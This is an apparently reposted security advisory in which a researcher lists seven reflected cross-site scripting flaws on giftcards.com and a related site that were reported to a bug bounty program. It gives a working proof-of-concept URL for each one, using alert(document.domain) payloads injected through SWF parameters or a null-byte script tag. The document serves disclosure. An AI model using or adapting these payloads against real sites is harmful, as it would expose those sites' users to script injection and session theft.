Giftcard Cross Site Scripting

2014.02.19
Credit: sschurtz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Since November 2013 I reported seven Cross-site Scripting vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of them wasn't a duplicate :-/. Strange? Perhaps, but not impossible given the simplicity of the vulnerabilities. But what I really don't understand: Why do they still work until today? ###################################### # 11/17/2013 Vulnerability #1: (DUP) # ###################################### // Reflected Cross-site Scripting http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}// // Original advisory http://insight-labs.org/?p=738 Screenshot: http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG ######################################################### # 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) # ######################################################### // Reflected Cross-site Scripting (tested with FF 25.0.1) http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);// // Original Advisory http://inj3ct0rs.com/exploit/description/19711 Screenshots: http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG ###################################### # 11/21/2013 Vulnerability #3: (DUP) # ###################################### // Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1) http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain); http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain); Screenshots: http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG ###################################### # 11/26/2013 Vulnerability #4: (DUP) # ###################################### // Reflected Cross-site Scripting with IE10 https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script> Screenshot: http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG ################################ # 12/05/2013 Vulnerability #5: # ################################ // Reflected Cross-site Scripting with IE10 https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script> Screenshot: http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG ################################ # 12/05/2013 Vulnerability #6: # ################################ // Reflected Cross-site Scripting with IE10 https://www.giftcards.com/member?%00"><script>alert(document.domain)</script> Screenshot: http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG ################################ # 12/05/2013 Vulnerability #7: # ################################ // Reflected Cross-site Scripting with IE10 http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script> Screenshot: http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG Cheers, sschurtz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlMC+gUACgkQg3svV2LcbMAVOQCePRZ4zb2nhf+6UowoxtTbkb1s 8wIAmQG/BGuP6kNdni4vaae4x0mhPn3P =SZx4 -----END PGP SIGNATURE-----

References:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG
http://insight-labs.org/?p=738


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top